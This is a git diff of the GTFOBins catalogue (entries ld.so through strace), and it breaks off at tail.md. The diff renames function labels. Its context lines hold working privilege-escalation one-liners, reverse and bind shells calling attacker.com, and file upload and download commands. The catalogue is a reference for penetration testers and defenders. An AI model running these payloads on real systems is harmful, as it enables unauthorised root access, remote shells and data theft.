/lib64/ld-linux-x86-64.so.2 ``` functions: - execute-interactive: + shell: - code: /lib/ld.so /bin/sh - suid-enabled: + suid: - code: ./ld.so /bin/sh -p - sudo-enabled: + sudo: - code: sudo /lib/ld.so /bin/sh --- diff --git a/_gtfobins/less.md b/_gtfobins/less.md index 9e7aaeb..04de295 100644 --- a/_gtfobins/less.md +++ b/_gtfobins/less.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | less /etc/profile !/bin/sh @@ -14,10 +14,10 @@ functions: echo DATA | less sfile_to_write q - sudo-enabled: + sudo: - code: | sudo less /etc/profile !/bin/sh - suid-enabled: + suid: - code: ./less file_to_read --- diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md index f7b420b..1052235 100644 --- a/_gtfobins/ltrace.md +++ b/_gtfobins/ltrace.md @@ -1,7 +1,7 @@ --- functions: - execute-interactive: + shell: - code: ltrace -b -L /bin/sh - sudo-enabled: + sudo: - code: sudo ltrace -b -L /bin/sh --- diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md index 82c68d8..17ff92f 100644 --- a/_gtfobins/lua.md +++ b/_gtfobins/lua.md @@ -1,8 +1,8 @@ --- functions: - execute-interactive: + shell: - code: lua -e 'os.execute("/bin/sh")' - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed. code: | export RHOST=attacker.com @@ -15,7 +15,7 @@ functions: local b=assert(f:read("*a"));t:send(b); end; f:close();t:close();' - bind-shell-non-interactive: + non-interactive-bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed. code: | export LPORT=12345 @@ -26,7 +26,7 @@ functions: local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();' - upload: + file-upload: - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed. code: | RHOST=attacker.com @@ -41,7 +41,7 @@ functions: t:connect(os.getenv("RHOST"),os.getenv("RPORT")); t:send(d); t:close();' - download: + file-download: - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed. code: | @@ -59,8 +59,8 @@ functions: - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);' file-read: - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' - sudo-enabled: + sudo: - code: sudo lua -e 'os.execute("/bin/sh")' - suid-limited: + limited-suid: - code: ./lua -e 'os.execute("/bin/sh")' --- diff --git a/_gtfobins/mail.md b/_gtfobins/mail.md index c6f46d1..10a2bff 100644 --- a/_gtfobins/mail.md +++ b/_gtfobins/mail.md @@ -1,13 +1,13 @@ --- functions: - execute-interactive: + shell: - description: This creates a valid Mbox file which may be required by the binary. code: | TF=$(mktemp) echo "From nobody@localhost $(date)" > $TF mail -f $TF !/bin/sh - sudo-enabled: + sudo: - description: This creates a valid Mbox file which may be required by the binary. code: | TF=$(mktemp) diff --git a/_gtfobins/make.md b/_gtfobins/make.md index 6f89ca6..fe08eb7 100644 --- a/_gtfobins/make.md +++ b/_gtfobins/make.md @@ -1,7 +1,7 @@ --- description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`. functions: - execute-interactive: + shell: - code: | COMMAND='/bin/sh' make -s --eval=$'x:\n\t-'"$COMMAND" @@ -10,11 +10,11 @@ functions: code: | LFILE=file_to_write make -s --eval="\$(file >$LFILE,DATA)" . - suid-enabled: + suid: - code: | COMMAND='/bin/sh -p' ./make -s --eval=$'x:\n\t-'"$COMMAND" - sudo-enabled: + sudo: - code: | COMMAND='/bin/sh' sudo make -s --eval=$'x:\n\t-'"$COMMAND" diff --git a/_gtfobins/man.md b/_gtfobins/man.md index c93bb1c..4734fd0 100644 --- a/_gtfobins/man.md +++ b/_gtfobins/man.md @@ -1,16 +1,16 @@ --- functions: - execute-interactive: + shell: - code: | man man !/bin/sh file-read: - code: man file_to_read - sudo-enabled: + sudo: - code: | sudo man man !/bin/sh - suid-limited: + limited-suid: - code: | ./man man !/bin/sh diff --git a/_gtfobins/more.md b/_gtfobins/more.md index 217a18d..1a37f2f 100644 --- a/_gtfobins/more.md +++ b/_gtfobins/more.md @@ -1,14 +1,14 @@ --- functions: - execute-interactive: + shell: - code: | TERM= more /etc/profile !/bin/sh file-read: - code: more file_to_read - suid-enabled: + suid: - code: ./more file_to_read - sudo-enabled: + sudo: - code: | TERM= sudo -E more /etc/profile !/bin/sh diff --git a/_gtfobins/mount.md b/_gtfobins/mount.md index 1af15a4..9655adc 100644 --- a/_gtfobins/mount.md +++ b/_gtfobins/mount.md @@ -1,6 +1,6 @@ --- functions: - sudo-enabled: + sudo: - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. code: | sudo mount -o bind /bin/sh /bin/mount diff --git a/_gtfobins/mv.md b/_gtfobins/mv.md index f4ce08a..546cad9 100644 --- a/_gtfobins/mv.md +++ b/_gtfobins/mv.md @@ -1,13 +1,13 @@ --- description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges. functions: - suid-enabled: + suid: - code: | LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF ./mv $TF $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_write TF=$(mktemp) diff --git a/_gtfobins/mysql.md b/_gtfobins/mysql.md index dbfc571..533dea4 100644 --- a/_gtfobins/mysql.md +++ b/_gtfobins/mysql.md @@ -1,10 +1,10 @@ --- description: A valid MySQL server must be available. functions: - execute-interactive: + shell: - code: mysql -e '\! /bin/sh' - sudo-enabled: + sudo: - code: sudo mysql -e '\! /bin/sh' - suid-limited: + limited-suid: - code: ./mysql -e '\! /bin/sh' --- diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md index 928ecc3..143ea56 100644 --- a/_gtfobins/nano.md +++ b/_gtfobins/nano.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp) echo 'exec sh' > $TF @@ -14,14 +14,14 @@ functions: ^O file-read: - code: nano file_to_read - suid-enabled: + suid: - code: | TF=$(mktemp) echo 'exec sh -p' > $TF chmod +x $TF ./nano -s $TF /etc/hosts ^T - sudo-enabled: + sudo: - code: | TF=$(mktemp) echo 'exec sh' > $TF diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index d0f253a..c5bb2ac 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md @@ -1,36 +1,36 @@ --- functions: - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. code: | RHOST=attacker.com RPORT=12345 nc -e /bin/sh $RHOST $RPORT - bind-shell-interactive: + bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional. code: | LPORT=12345 nc -l -p $LPORT -e /bin/sh - upload: + file-upload: - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | RHOST=attacker.com RPORT=12345 LFILE=file_to_send nc $RHOST $RPORT < "$LFILE" - download: + file-download: - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | LPORT=12345 LFILE=file_to_save nc -l -p $LPORT > "$LFILE" - sudo-enabled: + sudo: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. code: | RHOST=attacker.com RPORT=12345 sudo nc -e /bin/sh $RHOST $RPORT - suid-limited: + limited-suid: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. code: | RHOST=attacker.com diff --git a/_gtfobins/nice.md b/_gtfobins/nice.md index 47c08b2..8106c1e 100644 --- a/_gtfobins/nice.md +++ b/_gtfobins/nice.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: nice /bin/sh - suid-enabled: + suid: - code: ./nice /bin/sh -p - sudo-enabled: + sudo: - code: sudo nice /bin/sh --- diff --git a/_gtfobins/nl.md b/_gtfobins/nl.md index c612274..bd0e97a 100644 --- a/_gtfobins/nl.md +++ b/_gtfobins/nl.md @@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read nl -bn -w1 -s '' $LFILE - suid-enabled: + suid: - code: | LFILE=file_to_read ./nl -bn -w1 -s '' $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo nl -bn -w1 -s '' $LFILE diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 1eadeb1..1be2c9c 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -1,12 +1,12 @@ --- functions: - execute-interactive: + shell: - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com @@ -21,7 +21,7 @@ functions: end; f:close();t:close();' > $TF nmap --script=$TF - bind-shell-non-interactive: + non-interactive-bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. code: | export LPORT=12345 @@ -34,7 +34,7 @@ functions: local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();' > $TF nmap --script=$TF - upload: + file-upload: - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | export RHOST=attacker.com @@ -50,7 +50,7 @@ functions: t:send(d); t:close();' > $TF nmap --script=$TF - download: + file-download: - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | @@ -76,13 +76,13 @@ functions: TF=$(mktemp) echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF nmap --script=$TF - sudo-enabled: + sudo: - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF - suid-limited: + limited-suid: - description: Input echo is disabled. code: | TF=$(mktemp) diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 64c1dd4..bde6d6f 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: | node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com @@ -14,7 +14,7 @@ functions: sh.stdout.pipe(this); sh.stderr.pipe(this); });' - bind-shell-interactive: + bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. code: | export LPORT=12345 @@ -24,13 +24,13 @@ functions: sh.stdout.pipe(client); sh.stderr.pipe(client); }).listen(process.env.LPORT);' - suid-enabled: + suid: - code: | ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});' - sudo-enabled: + sudo: - code: | sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' - capabilities-enabled: + capabilities: - code: | ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' --- diff --git a/_gtfobins/od.md b/_gtfobins/od.md index 4a82e45..e1c0341 100644 --- a/_gtfobins/od.md +++ b/_gtfobins/od.md @@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read od -An -c -w9999 "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./od -An -c -w9999 "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo od -An -c -w9999 "$LFILE" diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index d12e1f8..018e02e 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md @@ -1,17 +1,17 @@ --- functions: - execute-interactive: + shell: - code: perl -e 'exec "/bin/sh";' - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' - suid-enabled: + suid: - code: ./perl -e 'exec "/bin/sh";' - sudo-enabled: + sudo: - code: sudo perl -e 'exec "/bin/sh";' - capabilities-enabled: + capabilities: - code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' --- diff --git a/_gtfobins/pg.md b/_gtfobins/pg.md index 6ecf33a..78fa376 100644 --- a/_gtfobins/pg.md +++ b/_gtfobins/pg.md @@ -1,15 +1,15 @@ --- functions: - execute-interactive: + shell: - code: | pg /etc/profile !/bin/sh file-read: - code: pg file_to_read - sudo-enabled: + sudo: - code: | sudo pg /etc/profile !/bin/sh - suid-enabled: + suid: - code: ./pg file_to_read --- diff --git a/_gtfobins/php.md b/_gtfobins/php.md index 7acdeb1..f0f1ade 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | export CMD="/bin/sh" php -r 'system(getenv("CMD"));' @@ -16,37 +16,37 @@ functions: - code: | export CMD="/bin/sh" php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' - execute-non-interactive: + command: - code: | export CMD="id" php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' - upload: + file-upload: - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later. code: | LHOST=0.0.0.0 LPORT=8888 php -S $LHOST:$LPORT - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get export LFILE=file_to_save php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' - suid-enabled: + suid: - code: | CMD="/bin/sh" ./php -r "system('$CMD');" - sudo-enabled: + sudo: - code: | CMD="/bin/sh" sudo php -r "system('$CMD');" - capabilities-enabled: + capabilities: - code: | CMD="/bin/sh" ./php -r "posix_setuid(0); system('$CMD');" diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md index e6dc547..479567c 100644 --- a/_gtfobins/pico.md +++ b/_gtfobins/pico.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp) echo 'exec sh' > $TF @@ -14,14 +14,14 @@ functions: ^O file-read: - code: pico file_to_read - suid-enabled: + suid: - code: | TF=$(mktemp) echo 'exec sh -p' > $TF chmod +x $TF ./pico -s $TF /etc/hosts ^T - sudo-enabled: + sudo: - code: | TF=$(mktemp) echo 'exec sh' > $TF diff --git a/_gtfobins/pip.md b/_gtfobins/pip.md index dbb7b1b..5e76217 100644 --- a/_gtfobins/pip.md +++ b/_gtfobins/pip.md @@ -1,11 +1,11 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py pip install $TF - reverse-shell-interactive: + reverse-shell: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com @@ -16,7 +16,7 @@ functions: [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' > $TF/setup.py pip install $TF - upload: + file-upload: - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/ @@ -36,7 +36,7 @@ functions: else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py pip install $TF - download: + file-download: - description: Fetch a remote file via HTTP GET request. It needs an absolute local file path. code: | export URL=http://attacker.com/file_to_get @@ -60,12 +60,12 @@ functions: TF=$(mktemp -d) echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py pip install $TF - load-library: + library-load: - code: | TF=$(mktemp -d) echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py pip install $TF - sudo-enabled: + sudo: - code: | TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md index 416f606..7557675 100644 --- a/_gtfobins/puppet.md +++ b/_gtfobins/puppet.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" file-write: @@ -13,7 +13,7 @@ functions: code: | export LFILE=file_to_read puppet filebucket -l diff /dev/null $LFILE - sudo-enabled: + sudo: - code: | sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" --- diff --git a/_gtfobins/python.md b/_gtfobins/python.md index f7f996d..1d8987b 100644 --- a/_gtfobins/python.md +++ b/_gtfobins/python.md @@ -1,9 +1,9 @@ --- description: The payloads are compatible with both Python version 2 and 3. functions: - execute-interactive: + shell: - code: python -c 'import os; os.system("/bin/sh")' - reverse-shell-interactive: + reverse-shell: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com @@ -12,7 +12,7 @@ functions: s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' - upload: + file-upload: - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/ @@ -28,7 +28,7 @@ functions: if sys.version_info.major == 3: import http.server as s, socketserver as ss else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get @@ -41,12 +41,12 @@ functions: - code: python -c 'open("file_to_write","w+").write("DATA")' file-read: - code: python -c 'print(open("file_to_read").read())' - load-library: + library-load: - code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - suid-enabled: + suid: - code: ./python -c 'import os; os.system("/bin/sh -p")' - sudo-enabled: + sudo: - code: sudo python -c 'import os; os.system("/bin/sh")' - capabilities-enabled: + capabilities: - code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")' --- diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md index 7dd28f8..03e3a16 100644 --- a/_gtfobins/rlwrap.md +++ b/_gtfobins/rlwrap.md @@ -1,14 +1,14 @@ --- functions: - execute-interactive: + shell: - code: rlwrap /bin/sh file-write: - description: This adds timestamps to the output file. This relies on the external `echo` command. code: | LFILE=file_to_write rlwrap -l "$LFILE" echo DATA - suid-enabled: + suid: - code: ./rlwrap -H /dev/null /bin/sh -p - sudo-enabled: + sudo: - code: sudo rlwrap /bin/sh --- diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index e852209..6e56eb0 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' - suid-enabled: + suid: - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' - sudo-enabled: + sudo: - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' --- diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md index 9ec5af8..03fe575 100644 --- a/_gtfobins/rpmquery.md +++ b/_gtfobins/rpmquery.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - suid-enabled: + suid: - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' - sudo-enabled: + sudo: - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' --- diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md index 7a9d051..658f5c9 100644 --- a/_gtfobins/rsync.md +++ b/_gtfobins/rsync.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - sudo-enabled: + sudo: - code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - suid-enabled: + suid: - code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null --- diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index 1fe9fdb..b018d30 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -1,19 +1,19 @@ --- functions: - execute-interactive: + shell: - code: ruby -e 'exec "/bin/sh"' - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' - upload: + file-upload: - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later. code: | export LPORT=8888 ruby -run -e httpd . -p $LPORT - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export RHOST=attacker.com @@ -25,10 +25,10 @@ functions: - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' file-read: - code: ruby -e 'puts File.read("file_to_read")' - load-library: + library-load: - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' - sudo-enabled: + sudo: - code: sudo ruby -e 'exec "/bin/sh"' - capabilities-enabled: + capabilities: - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"' --- diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md index eba6c8e..d77922f 100644 --- a/_gtfobins/scp.md +++ b/_gtfobins/scp.md @@ -1,30 +1,30 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" scp -S $TF x y: - upload: + file-upload: - description: Send local file to a SSH server. code: | RPATH=user@attacker.com:~/file_to_save LPATH=file_to_send scp $LFILE $RPATH - download: + file-download: - description: Fetch a remote file from a SSH server. code: | RPATH=user@attacker.com:~/file_to_get LFILE=file_to_save scp $RPATH $LFILE - sudo-enabled: + sudo: - code: | TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y: - suid-limited: + limited-suid: - code: | TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index 2560133..61a2be9 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - description: GNU version only. Also, this requires `bash`. code: sed -n '1e exec sh 1>&0' /etc/hosts - execute-non-interactive: + command: - description: GNU version only. code: sed -n "1e id" /etc/hosts file-write: @@ -14,11 +14,11 @@ functions: - code: | LFILE=file_to_read sed '' "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./sed -e '' "$LFILE" - sudo-enabled: + sudo: - description: GNU version only. Also, this requires `bash`. code: sudo sed -n '1e exec sh 1>&0 /etc/hosts --- diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md index 50ce9b2..32686fc 100644 --- a/_gtfobins/setarch.md +++ b/_gtfobins/setarch.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: setarch $(arch) /bin/sh - suid-enabled: + suid: - code: ./setarch $(arch) /bin/sh -p - sudo-enabled: + sudo: - code: sudo setarch $(arch) /bin/sh --- diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md index 17d8fe4..fd0b4ad 100644 --- a/_gtfobins/sftp.md +++ b/_gtfobins/sftp.md @@ -1,23 +1,23 @@ --- functions: - execute-interactive: + shell: - code: | HOST=user@attacker.com sftp $HOST !/bin/sh - upload: + file-upload: - description: Send local file to a SSH server. code: | RHOST=user@attacker.com sftp $RHOST put file_to_send file_to_save - download: + file-download: - description: Fetch a remote file from a SSH server. code: | RHOST=user@attacker.com sftp $RHOST get file_to_get file_to_save - sudo-enabled: + sudo: - code: | HOST=user@attacker.com sudo sftp $HOST diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md index 963a441..606eba7 100644 --- a/_gtfobins/shuf.md +++ b/_gtfobins/shuf.md @@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_write shuf -e DATA -o "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_write ./shuf -e DATA -o "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_write sudo shuf -e DATA -o "$LFILE" diff --git a/_gtfobins/smbclient.md b/_gtfobins/smbclient.md index b35fc1d..b1a267e 100644 --- a/_gtfobins/smbclient.md +++ b/_gtfobins/smbclient.md @@ -1,11 +1,11 @@ --- description: A valid SMB/CIFS server must be available. functions: - execute-interactive: + shell: - code: | smbclient \\ip\share !/bin/sh - sudo-enabled: + sudo: - code: | sudo smbclient \\ip\share !/bin/sh diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index 1923073..f7185b3 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -1,23 +1,23 @@ --- functions: - reverse-shell-interactive: + reverse-shell: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane - bind-shell-interactive: + bind-shell: - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell. code: | LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane - sudo-enabled: + sudo: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane - suid-limited: + limited-suid: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | RHOST=attacker.com diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md index a352a5c..371c52d 100644 --- a/_gtfobins/sort.md +++ b/_gtfobins/sort.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read sort -m "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./sort -m "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo sort -m "$LFILE" diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md index d826e24..12daa5b 100644 --- a/_gtfobins/sqlite3.md +++ b/_gtfobins/sqlite3.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: sqlite3 /dev/null '.shell /bin/sh' file-write: - code: | @@ -14,8 +14,8 @@ functions: .import $LFILE t SELECT * FROM t; EOF - sudo-enabled: + sudo: - code: sudo sqlite3 /dev/null '.shell /bin/sh' - suid-limited: + limited-suid: - code: "./sqlite3 /dev/null '.shell /bin/sh'" --- diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index 72a718e..cc689e2 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -1,18 +1,18 @@ --- functions: - execute-interactive: + shell: - description: Reconnecting may help bypassing restricted shells. code: ssh localhost $SHELL --noprofile --norc - description: Spawn interactive shell through ProxyCommand option. code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x - upload: + file-upload: - description: Send local file to a SSH server. code: | HOST=user@attacker.com RPATH=file_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH - download: + file-download: - description: Fetch a remote file from a SSH server. code: | HOST=user@attacker.com @@ -24,7 +24,7 @@ functions: code: | LFILE=file_to_read ssh -F $LFILE localhost - sudo-enabled: + sudo: - description: Spawn interactive root shell through ProxyCommand option. code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x --- diff --git a/_gtfobins/stdbuf.md b/_gtfobins/stdbuf.md index 24977b8..c3b7c6e 100644 --- a/_gtfobins/stdbuf.md +++ b/_gtfobins/stdbuf.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: stdbuf -i0 /bin/sh - suid-enabled: + suid: - code: ./stdbuf -i0 /bin/sh -p - sudo-enabled: + sudo: - code: sudo stdbuf -i0 /bin/sh --- diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md index 18cfdb0..81c6f49 100644 --- a/_gtfobins/strace.md +++ b/_gtfobins/strace.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: strace -o /dev/null /bin/sh - suid-enabled: + suid: - code: ./strace -o /dev/null /bin/sh -p - sudo-enabled: + sudo: - code: sudo strace -o /dev/null /bin/sh --- diff --git a/_gtfobins/tail.md 